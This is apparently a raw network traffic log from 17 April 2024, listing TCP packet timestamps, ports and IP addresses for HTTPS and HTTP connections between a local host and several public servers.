                                                                                                                          Apr 17, 2024 02:34:30.448558092 CEST44349758104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.448559999 CEST49758443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:30.456139088 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.492202997 CEST49758443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:30.492212057 CEST44349758104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.667092085 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.667342901 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.667418003 CEST49757443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.667429924 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.667448044 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.668834925 CEST49757443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.707339048 CEST44349758104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.707621098 CEST44349758104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.707681894 CEST49758443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:30.713486910 CEST49757443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.713501930 CEST44349757104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.778815031 CEST49758443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:30.778836012 CEST44349758104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.931257963 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.931349039 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:30.931432962 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.931646109 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:30.931670904 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.151501894 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.151788950 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.151850939 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.152975082 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.153363943 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.153543949 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.153569937 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.153636932 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.153765917 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.153866053 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.153896093 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411113024 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411242962 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411326885 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411397934 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.411406040 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411468029 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411528111 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.411545992 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411632061 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411638975 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.411658049 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411708117 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.411760092 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411928892 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.411983967 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.411995888 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412086010 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412147045 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.412158012 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412297010 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412369013 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412369967 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.412390947 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412437916 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.412472963 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412856102 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.412925005 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.413213968 CEST49759443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:31.413243055 CEST44349759104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.422914028 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.422957897 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.423021078 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.423248053 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.423254967 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.640373945 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.640575886 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.640584946 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.641021013 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.641361952 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.641438007 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.641459942 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.684130907 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.692105055 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.900549889 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.900851011 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:31.900901079 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.901592970 CEST49760443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:31.901609898 CEST44349760104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:35.227463961 CEST44349741172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:35.227622032 CEST44349741172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:35.227739096 CEST49741443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:34:37.482507944 CEST49741443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:34:37.482527018 CEST44349741172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.073591948 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.073623896 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.073683023 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.074129105 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.074150085 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.293560982 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.293855906 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.293884993 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.294972897 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.295330048 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.295491934 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.295504093 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.295567989 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.295623064 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.295701027 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.295775890 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.566775084 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.566896915 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.566979885 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.567034006 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.567065001 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.567111015 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.567120075 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.567301989 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.567373037 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.567641973 CEST49767443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:41.567652941 CEST44349767104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.574045897 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.574074030 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.574287891 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.574712038 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.574748039 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.574897051 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.574908018 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.574955940 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.575171947 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.575196028 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.793145895 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.793378115 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.793401003 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.793411970 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.793521881 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.793536901 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.793869019 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.794138908 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.794198990 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.794296026 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.794313908 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:41.794325113 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.794487000 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.794739962 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.794806957 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.794903994 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:41.835398912 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:41.835477114 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:42.054478884 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:42.054748058 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:42.054817915 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:42.057024956 CEST49768443192.168.2.4104.17.3.184
                                                                                                                          Apr 17, 2024 02:34:42.057045937 CEST44349768104.17.3.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:42.815607071 CEST8049723217.20.55.36192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:42.815764904 CEST4972380192.168.2.4217.20.55.36
                                                                                                                          Apr 17, 2024 02:34:42.815814972 CEST4972380192.168.2.4217.20.55.36
                                                                                                                          Apr 17, 2024 02:34:43.116664886 CEST4972380192.168.2.4217.20.55.36
                                                                                                                          Apr 17, 2024 02:34:43.220587969 CEST8049723217.20.55.36192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.309240103 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.309361935 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.309530973 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.310184002 CEST49769443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.310213089 CEST44349769104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.320084095 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.320167065 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.320246935 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.320544958 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.320585012 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.320725918 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.320760012 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.320817947 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.320960999 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.321069002 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.321105957 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.321358919 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.322742939 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.322771072 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.322968960 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.322983980 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.323084116 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.323100090 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.323210955 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.323235989 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.537034988 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.537266016 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.537286043 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.537574053 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.537862062 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.537915945 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.543881893 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.544378042 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.544408083 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.545593023 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.545924902 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.546150923 CEST44349773104.17.2.184192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.547377110 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.547538996 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.547549009 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.548053980 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.548329115 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.548413038 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.548443079 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.548451900 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.550188065 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.550374985 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.550405979 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.551484108 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.551759958 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.551924944 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.591337919 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:34:43.591351032 CEST49773443192.168.2.4104.17.2.184
                                                                                                                          Apr 17, 2024 02:34:43.591351032 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.591463089 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:43.699719906 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.699774981 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.699939966 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.700095892 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.700129032 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.932322979 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.932564974 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.932588100 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.936182976 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.936268091 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.936546087 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.936656952 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.936666965 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.936719894 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.990170002 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:43.990181923 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:44.037492990 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:45.075263977 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.075499058 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.075619936 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.075680971 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.075808048 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.075977087 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.076797009 CEST49771443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.076837063 CEST44349771104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.125148058 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.125215054 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.125596046 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.126604080 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.126636982 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.127007008 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.168191910 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.350457907 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.350871086 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.350892067 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.351984024 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.352703094 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.352890015 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.401277065 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:45.474319935 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.474502087 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:45.474694967 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:45.475589991 CEST49774443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:45.475636959 CEST44349774172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:46.532501936 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:46.532752991 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:46.532807112 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:46.534696102 CEST49770443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:46.534712076 CEST44349770104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:46.538317919 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:46.538503885 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.904807091 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906497002 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906536102 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906538010 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.906558037 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906584024 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906610966 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.906621933 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.906699896 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.906851053 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907073021 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907109022 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907118082 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.907124996 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907160997 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.907169104 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907753944 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907790899 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907799006 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.907805920 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907854080 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.907856941 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907871008 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.907927990 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.907936096 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908659935 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908699036 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908713102 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.908720016 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908744097 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908763885 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:47.908770084 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:47.908807993 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:48.227158070 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227322102 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227361917 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227380991 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:48.227404118 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227444887 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227485895 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227519989 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227545977 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:48.227545977 CEST49775443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:34:48.227555990 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227598906 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227639914 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227724075 CEST44349775104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.227732897 CEST49775443192.168.2.4104.21.3.147
